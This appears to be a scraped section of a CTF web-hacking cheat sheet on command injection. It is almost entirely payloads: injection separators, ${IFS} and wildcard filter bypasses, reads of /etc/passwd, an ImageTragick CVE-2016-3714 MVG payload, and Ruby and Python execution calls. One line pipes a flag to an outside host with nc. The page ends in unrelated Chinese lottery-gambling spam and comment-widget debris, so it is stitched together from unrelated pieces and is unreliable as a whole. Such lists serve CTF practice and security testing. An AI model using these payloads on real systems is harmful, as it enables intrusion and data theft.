Command Injection
| cat flag
&& cat flag
; cat flag
%0a cat flag
"; cat flag
`cat flag`
cat $(ls)
"; cat $(ls)
`cat flag | nc kaibro.tw 5278`
. flag
PS1=$(cat flag)
? and *
?match one charactercat fl?g/???/??t /???/p??s??
*match 多個cat f*cat f?a*
空白繞過
${IFS}cat${IFS}flagls$IFS-alhcat$IFS$2flag
cat</etc/passwd{cat,/etc/passwd}X=$'cat\x20/etc/passwd'&&$XIFS=,;`cat<<<uname,-a`- bash only
Keyword繞過
-
String Concat
A=fl;B=ag;cat $A$B
-
Empty Variable
cat fl${x}agcat tes$(z)t/flag
-
Environment Variable
$PATH => "/usr/local/….blablabla”${PATH:0:1} => '/'${PATH:1:1} => 'u'${PATH:0:4} => '/usr'
-
Empty String
cat fl""agcat fl''agcat "fl""ag"
ImageMagick (ImageTragick)
- CVE-2016-3714
mvg格式包含https處理(使用curl下載),可以閉合雙引號- payload:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://kaibro.tw";ls "-la)'
pop graphic-context
Ruby Command Executing
open("| ls")IO.popen("ls").readKernel.exec("ls")`ls`system("ls")eval("ruby code")- Non-Alphanumeric example: HITCON CTF 2015 - Hard to say
$$/$$=> 1'' << 97 << 98 << 99=> "abc"$:即$LOAD_PATH
- Non-Alphanumeric example: HITCON CTF 2015 - Hard to say
exec("ls")%x{ls}- Net::FTP
- CVE-2017-17405
- use
Kernel#open
Python Command Executing
os.system("ls")os.popen("ls").read()os.execl("/bin/ls","")os.execlp("ls","")os.execv("/bin/ls",[''])os.execvp("/bin/ls",[""])subprocess.call("ls")subprocess.call("ls|cat",shell=False)=> Failsubprocess.call("ls|cat",shell=True)=> Correct
eval("__import__('os').system('ls')")exec("__import__('os').system('ls')")commands.getoutput('ls')
-
玩家要把握开奖的表现特征以及开奖的历史情况 英国乐透。全力解读各种阶段性走势规律,比如观看幸运飞艇开奖直播就能够分析重叠码 澳洲幸运20、冷热号、空档等 幸运飞艇,这些都是玩家在投注前必须要分析研究的。(0) 回复 (0) -
(0) 回复 (0) -
(0) 回复 (2)
-
(0) 回复
-
(0) 回复
你还没有登录,请先登录或注册! -
-
(0) 回复 (3)-
(0) 回复
-
(0) 回复
-
(0) 回复
你还没有登录,请先登录或注册! -
-
(0) 回复 (4)-
(0) 回复
-
(0) 回复
-
(0) 回复
-
(0) 回复
你还没有登录,请先登录或注册! -
-
(0) 回复 (5)-
(0) 回复
-
(0) 回复
-
(0) 回复
-
(0) 回复
-
(0) 回复
你还没有登录,请先登录或注册! -
-
(0) 回复 (6)-
(0) 回复
-
(0) 回复
-
(0) 回复
-
(0) 回复
-
(0) 回复
你还没有登录,请先登录或注册! -